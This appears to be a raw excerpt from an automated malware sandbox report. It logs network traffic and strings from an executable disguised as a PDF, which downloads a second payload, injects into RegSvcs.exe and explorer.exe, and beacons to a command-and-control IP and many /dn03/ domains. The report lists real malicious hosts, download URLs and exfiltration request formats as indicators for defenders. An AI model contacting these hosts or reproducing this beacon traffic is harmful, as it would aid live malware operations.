            Source: global trafficHTTP traffic detected: POST /index.php/3b1tenbkyj HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.137.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: DCC85916Content-Length: 145Connection: close
            Source: global trafficHTTP traffic detected: POST /index.php/3b1tenbkyj HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.137.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: DCC85916Content-Length: 145Connection: close
            Source: global trafficHTTP traffic detected: POST /index.php/3b1tenbkyj HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.137.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: DCC85916Content-Length: 145Connection: close
            Source: global trafficHTTP traffic detected: POST /index.php/3b1tenbkyj HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.137.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: DCC85916Content-Length: 145Connection: close
            Source: global trafficHTTP traffic detected: POST /index.php/3b1tenbkyj HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.137.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: DCC85916Content-Length: 145Connection: close
            Source: global trafficHTTP traffic detected: POST /index.php/3b1tenbkyj HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.137.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: DCC85916Content-Length: 145Connection: close
            Source: global trafficHTTP traffic detected: POST /index.php/3b1tenbkyj HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.137.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: DCC85916Content-Length: 145Connection: close
            Source: global trafficHTTP traffic detected: POST /index.php/3b1tenbkyj HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.137.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: DCC85916Content-Length: 145Connection: close
            Source: global trafficHTTP traffic detected: POST /index.php/3b1tenbkyj HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.137.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: DCC85916Content-Length: 145Connection: close
            Source: global trafficHTTP traffic detected: POST /index.php/3b1tenbkyj HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.137.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: DCC85916Content-Length: 145Connection: close
            Source: global trafficHTTP traffic detected: POST /index.php/3b1tenbkyj HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.137.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: DCC85916Content-Length: 145Connection: close
            Source: global trafficHTTP traffic detected: POST /index.php/3b1tenbkyj HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.137.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: DCC85916Content-Length: 145Connection: close
            Source: global trafficHTTP traffic detected: POST /index.php/3b1tenbkyj HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.137.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: DCC85916Content-Length: 145Connection: close
            Source: global trafficHTTP traffic detected: POST /index.php/3b1tenbkyj HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.137.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: DCC85916Content-Length: 145Connection: close
            Source: global trafficHTTP traffic detected: POST /index.php/3b1tenbkyj HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.137.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: DCC85916Content-Length: 145Connection: close
            Source: global trafficHTTP traffic detected: POST /index.php/3b1tenbkyj HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.137.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: DCC85916Content-Length: 145Connection: close
            Source: global trafficHTTP traffic detected: POST /index.php/3b1tenbkyj HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.137.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: DCC85916Content-Length: 145Connection: close
            Source: global trafficHTTP traffic detected: POST /index.php/3b1tenbkyj HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.137.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: DCC85916Content-Length: 145Connection: close
            Source: global trafficHTTP traffic detected: POST /index.php/3b1tenbkyj HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.137.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: DCC85916Content-Length: 145Connection: close
            Source: global trafficHTTP traffic detected: POST /index.php/3b1tenbkyj HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.137.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: DCC85916Content-Length: 145Connection: close
            Source: global trafficHTTP traffic detected: POST /index.php/3b1tenbkyj HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.137.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: DCC85916Content-Length: 145Connection: close
            Source: global trafficHTTP traffic detected: POST /index.php/3b1tenbkyj HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.137.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: DCC85916Content-Length: 145Connection: close
            Source: global trafficHTTP traffic detected: POST /index.php/3b1tenbkyj HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.137.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: DCC85916Content-Length: 145Connection: close
            Source: global trafficHTTP traffic detected: POST /index.php/3b1tenbkyj HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.137.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: DCC85916Content-Length: 145Connection: close
            Source: global trafficHTTP traffic detected: POST /index.php/3b1tenbkyj HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.137.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: DCC85916Content-Length: 145Connection: close
            Source: global trafficHTTP traffic detected: POST /index.php/3b1tenbkyj HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.137.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: DCC85916Content-Length: 145Connection: close
            Source: global trafficHTTP traffic detected: POST /index.php/3b1tenbkyj HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.137.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: DCC85916Content-Length: 145Connection: close
            Source: global trafficHTTP traffic detected: POST /index.php/3b1tenbkyj HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.137.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: DCC85916Content-Length: 145Connection: close
            Source: global trafficHTTP traffic detected: POST /index.php/3b1tenbkyj HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.137.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: DCC85916Content-Length: 145Connection: close
            Source: global trafficHTTP traffic detected: POST /index.php/3b1tenbkyj HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.137.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: DCC85916Content-Length: 145Connection: close
            Source: global trafficHTTP traffic detected: POST /index.php/3b1tenbkyj HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.137.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: DCC85916Content-Length: 145Connection: close
            Source: unknownTCP traffic detected without corresponding DNS query: 45.61.137.215
            Source: unknownTCP traffic detected without corresponding DNS query: 45.61.137.215
            Source: unknownTCP traffic detected without corresponding DNS query: 45.61.137.215
            Source: unknownTCP traffic detected without corresponding DNS query: 45.61.137.215
            Source: unknownTCP traffic detected without corresponding DNS query: 45.61.137.215
            Source: unknownTCP traffic detected without corresponding DNS query: 45.61.137.215
            Source: unknownTCP traffic detected without corresponding DNS query: 45.61.137.215
            Source: unknownTCP traffic detected without corresponding DNS query: 45.61.137.215
            Source: unknownTCP traffic detected without corresponding DNS query: 45.61.137.215
            Source: unknownTCP traffic detected without corresponding DNS query: 45.61.137.215
            Source: unknownTCP traffic detected without corresponding DNS query: 45.61.137.215
            Source: unknownTCP traffic detected without corresponding DNS query: 45.61.137.215
            Source: unknownTCP traffic detected without corresponding DNS query: 45.61.137.215
            Source: unknownTCP traffic detected without corresponding DNS query: 45.61.137.215
            Source: unknownTCP traffic detected without corresponding DNS query: 45.61.137.215
            Source: unknownTCP traffic detected without corresponding DNS query: 45.61.137.215
            Source: unknownTCP traffic detected without corresponding DNS query: 45.61.137.215
            Source: unknownTCP traffic detected without corresponding DNS query: 45.61.137.215
            Source: unknownTCP traffic detected without corresponding DNS query: 45.61.137.215
            Source: unknownTCP traffic detected without corresponding DNS query: 45.61.137.215
            Source: unknownTCP traffic detected without corresponding DNS query: 45.61.137.215
            Source: unknownTCP traffic detected without corresponding DNS query: 45.61.137.215
            Source: unknownTCP traffic detected without corresponding DNS query: 45.61.137.215
            Source: unknownTCP traffic detected without corresponding DNS query: 45.61.137.215
            Source: unknownTCP traffic detected without corresponding DNS query: 45.61.137.215
            Source: unknownTCP traffic detected without corresponding DNS query: 45.61.137.215
            Source: unknownTCP traffic detected without corresponding DNS query: 45.61.137.215
            Source: unknownTCP traffic detected without corresponding DNS query: 45.61.137.215
            Source: unknownTCP traffic detected without corresponding DNS query: 45.61.137.215
            Source: unknownTCP traffic detected without corresponding DNS query: 45.61.137.215
            Source: unknownTCP traffic detected without corresponding DNS query: 45.61.137.215
            Source: unknownTCP traffic detected without corresponding DNS query: 45.61.137.215
            Source: unknownTCP traffic detected without corresponding DNS query: 45.61.137.215
            Source: unknownTCP traffic detected without corresponding DNS query: 45.61.137.215
            Source: unknownTCP traffic detected without corresponding DNS query: 45.61.137.215
            Source: unknownTCP traffic detected without corresponding DNS query: 45.61.137.215
            Source: unknownTCP traffic detected without corresponding DNS query: 45.61.137.215
            Source: unknownTCP traffic detected without corresponding DNS query: 45.61.137.215
            Source: unknownTCP traffic detected without corresponding DNS query: 45.61.137.215
            Source: unknownTCP traffic detected without corresponding DNS query: 45.61.137.215
            Source: unknownTCP traffic detected without corresponding DNS query: 45.61.137.215
            Source: unknownTCP traffic detected without corresponding DNS query: 45.61.137.215
            Source: unknownTCP traffic detected without corresponding DNS query: 45.61.137.215
            Source: unknownTCP traffic detected without corresponding DNS query: 45.61.137.215
            Source: unknownTCP traffic detected without corresponding DNS query: 45.61.137.215
            Source: unknownTCP traffic detected without corresponding DNS query: 45.61.137.215
            Source: unknownTCP traffic detected without corresponding DNS query: 45.61.137.215
            Source: unknownTCP traffic detected without corresponding DNS query: 45.61.137.215
            Source: unknownTCP traffic detected without corresponding DNS query: 45.61.137.215
            Source: unknownTCP traffic detected without corresponding DNS query: 45.61.137.215
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00404ED4 recv,15_2_00404ED4
            Source: global trafficHTTP traffic detected: GET /YLc7afPlL4RjCeK.exe HTTP/1.1Host: mbsngradnja.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /dn03/?KvOx3=URhw1ZwvIctTGCpPzcTqZFryLoAICCIR37RdTq+D27m0Ed9BTUTA8R/QfR+xv6khW63w&LhEx=ODKXZDVpY2w8gpmp HTTP/1.1Host: www.imdcaam.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /dn03/?KvOx3=rTguiTyPWe+LQ3wbOsvLrlRt5HkRD6mO+8zHcQ1TTPZ93ZKF8Svri6qQbYlnCi86X6wl&LhEx=ODKXZDVpY2w8gpmp HTTP/1.1Host: www.vivaness.clubConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /dn03/?KvOx3=JxIrrZbNPaA1C4PrhImOUNe+2n/09vmdrEF53puJ8yJ2Z/h/8YXf47jUpRM+pbGXlchT&LhEx=ODKXZDVpY2w8gpmp HTTP/1.1Host: www.servicepmgtl.worldConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /dn03/?KvOx3=z1cSYSgDw8EovxWDbEjrEjmudKiJC5ObQGBfFhSW6JRqxrcowHK672c/PJOQREkPG+UN&LhEx=ODKXZDVpY2w8gpmp HTTP/1.1Host: www.sukhiclothing.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /dn03/?KvOx3=JJyTLDumWHTBkarN0VPanW2WZHOeobli2nsK+rVOrq2yAp2byhlCx/KUbNmL9DZVQlbp&LhEx=ODKXZDVpY2w8gpmp HTTP/1.1Host: www.banditsolana.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /dn03/?KvOx3=GgD3Fcw+KScOn8zypM5BdJpW3iIUKLxhNIDvUm+FDOYyxu2AFxTq8ZqTICftVViamW1X&LhEx=ODKXZDVpY2w8gpmp HTTP/1.1Host: www.top-dao.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficDNS traffic detected: DNS query: mbsngradnja.com
            Source: global trafficDNS traffic detected: DNS query: www.imdcaam.com
            Source: global trafficDNS traffic detected: DNS query: www.lovedacademy.com
            Source: global trafficDNS traffic detected: DNS query: www.vivaness.club
            Source: global trafficDNS traffic detected: DNS query: www.w937xb.com
            Source: global trafficDNS traffic detected: DNS query: www.servicepmgtl.world
            Source: global trafficDNS traffic detected: DNS query: www.sukhiclothing.com
            Source: global trafficDNS traffic detected: DNS query: www.banditsolana.com
            Source: global trafficDNS traffic detected: DNS query: www.mcapitalparticipacoes.com
            Source: global trafficDNS traffic detected: DNS query: www.top-dao.com
            Source: global trafficDNS traffic detected: DNS query: www.jasonnutter.golf
            Source: global trafficDNS traffic detected: DNS query: www.cataclysmicgamingapparel.com
            Source: unknownHTTP traffic detected: POST /index.php/3b1tenbkyj HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.137.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: DCC85916Content-Length: 172Connection: close
            Source: RegSvcs.exe, 0000000F.00000002.3743055892.0000000000C68000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.3739899679.00000000004A0000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://45.61.137.215/index.php/3b1tenbkyj
            Source: explorer.exe, 00000014.00000000.1348137626.00000000087BB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000000.1348137626.0000000008685000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3083839373.0000000008685000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3757157162.0000000008685000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2297215475.0000000008685000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
            Source: explorer.exe, 00000014.00000000.1348137626.00000000087BB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000000.1348137626.0000000008685000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3083839373.0000000008685000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3757157162.0000000008685000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2297215475.0000000008685000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
            Source: explorer.exe, 00000014.00000000.1348137626.00000000087BB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000000.1348137626.0000000008685000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3083839373.0000000008685000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3757157162.0000000008685000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2297215475.0000000008685000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
            Source: Ajanlatkeres_2024.05.29.PDF.exe, 00000006.00000002.1324018301.0000000002F0E000.00000004.00000800.00020000.00000000.sdmp, Ajanlatkeres_2024.05.29.PDF.exe, 00000006.00000002.1324018301.0000000002F44000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mbsngradnja.com
            Source: Ajanlatkeres_2024.05.29.PDF.exe, 00000006.00000002.1324018301.0000000002EF3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mbsngradnja.com/YLc7afPlL4RjCeK.exe
            Source: explorer.exe, 00000014.00000000.1348137626.00000000087BB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000000.1348137626.0000000008685000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3083839373.0000000008685000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3757157162.0000000008685000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2297215475.0000000008685000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
            Source: explorer.exe, 00000014.00000003.2295790018.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3754530679.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000000.1341838999.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3083513944.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3084872227.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
            Source: explorer.exe, 00000014.00000002.3756715275.00000000082D0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000014.00000002.3755615297.0000000007670000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000014.00000000.1337250517.0000000002C60000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://schemas.micro
            Source: Ajanlatkeres_2024.05.29.PDF.exe, 00000006.00000002.1324018301.0000000002F0E000.00000004.00000800.00020000.00000000.sdmp, YLc7afPlL4RjCeK.exe, 0000000E.00000002.1334933254.0000000002FFE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: YLc7afPlL4RjCeK.exe, 0000000E.00000000.1314951505.0000000000C55000.00000002.00000001.01000000.0000000C.sdmp, Ajanlatkeres_2024.05.29.PDF.exe, YLc7afPlL4RjCeK.exe.6.drString found in binary or memory: http://tempuri.org/studentDataSet.xsd9MenuTry.Properties.Resources
            Source: explorer.exe, 00000014.00000003.3085276974.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2290783207.000000000C272000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3768699084.000000000C28A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2300737680.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2292457843.000000000C27F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.banditsolana.com
            Source: explorer.exe, 00000014.00000003.3085276974.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2290783207.000000000C272000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3768699084.000000000C28A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2300737680.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2292457843.000000000C27F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.banditsolana.com/dn03/
            Source: explorer.exe, 00000014.00000003.3085276974.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2290783207.000000000C272000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3768699084.000000000C28A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2300737680.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2292457843.000000000C27F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.banditsolana.com/dn03/www.mcapitalparticipacoes.com
            Source: explorer.exe, 00000014.00000003.3085276974.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2290783207.000000000C272000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3768699084.000000000C28A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2300737680.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2292457843.000000000C27F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.banditsolana.comReferer:
            Source: explorer.exe, 00000014.00000003.3085276974.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2290783207.000000000C272000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3768699084.000000000C28A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2300737680.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2292457843.000000000C27F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.bx2zyg.com
            Source: explorer.exe, 00000014.00000003.2292457843.000000000C27F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.bx2zyg.com/dn03/
            Source: explorer.exe, 00000014.00000003.3085276974.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2290783207.000000000C272000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3768699084.000000000C28A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2300737680.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2292457843.000000000C27F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.bx2zyg.comReferer:
            Source: explorer.exe, 00000014.00000003.3085276974.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2290783207.000000000C272000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3768699084.000000000C28A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2300737680.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2292457843.000000000C27F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.cataclysmicgamingapparel.com
            Source: explorer.exe, 00000014.00000003.3085276974.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2290783207.000000000C272000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3768699084.000000000C28A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2300737680.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2292457843.000000000C27F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.cataclysmicgamingapparel.com/dn03/
            Source: explorer.exe, 00000014.00000003.3085276974.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2290783207.000000000C272000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3768699084.000000000C28A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2300737680.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2292457843.000000000C27F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.cataclysmicgamingapparel.com/dn03/www.cyberxdefend.com
            Source: explorer.exe, 00000014.00000003.3085276974.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2290783207.000000000C272000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3768699084.000000000C28A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2300737680.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2292457843.000000000C27F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.cataclysmicgamingapparel.comReferer:
            Source: explorer.exe, 00000014.00000003.3085276974.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2290783207.000000000C272000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3768699084.000000000C28A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2300737680.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2292457843.000000000C27F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.cyberxdefend.com
            Source: explorer.exe, 00000014.00000003.3085276974.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2290783207.000000000C272000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3768699084.000000000C28A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2300737680.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2292457843.000000000C27F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.cyberxdefend.com/dn03/
            Source: explorer.exe, 00000014.00000003.3085276974.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2290783207.000000000C272000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3768699084.000000000C28A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2300737680.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2292457843.000000000C27F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.cyberxdefend.com/dn03/www.ioco.in
            Source: explorer.exe, 00000014.00000003.3085276974.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2290783207.000000000C272000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3768699084.000000000C28A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2300737680.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2292457843.000000000C27F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.cyberxdefend.comReferer:
            Source: RegSvcs.exe, RegSvcs.exe, 0000000F.00000002.3739899679.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://www.ibsensoftware.com/
            Source: explorer.exe, 00000014.00000003.3085276974.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2290783207.000000000C272000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3768699084.000000000C28A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2300737680.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2292457843.000000000C27F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.imdcaam.com
            Source: explorer.exe, 00000014.00000003.3085276974.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2290783207.000000000C272000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3768699084.000000000C28A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2300737680.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2292457843.000000000C27F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.imdcaam.com/dn03/
            Source: explorer.exe, 00000014.00000003.3085276974.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2290783207.000000000C272000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3768699084.000000000C28A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2300737680.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2292457843.000000000C27F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.imdcaam.com/dn03/www.lovedacademy.com
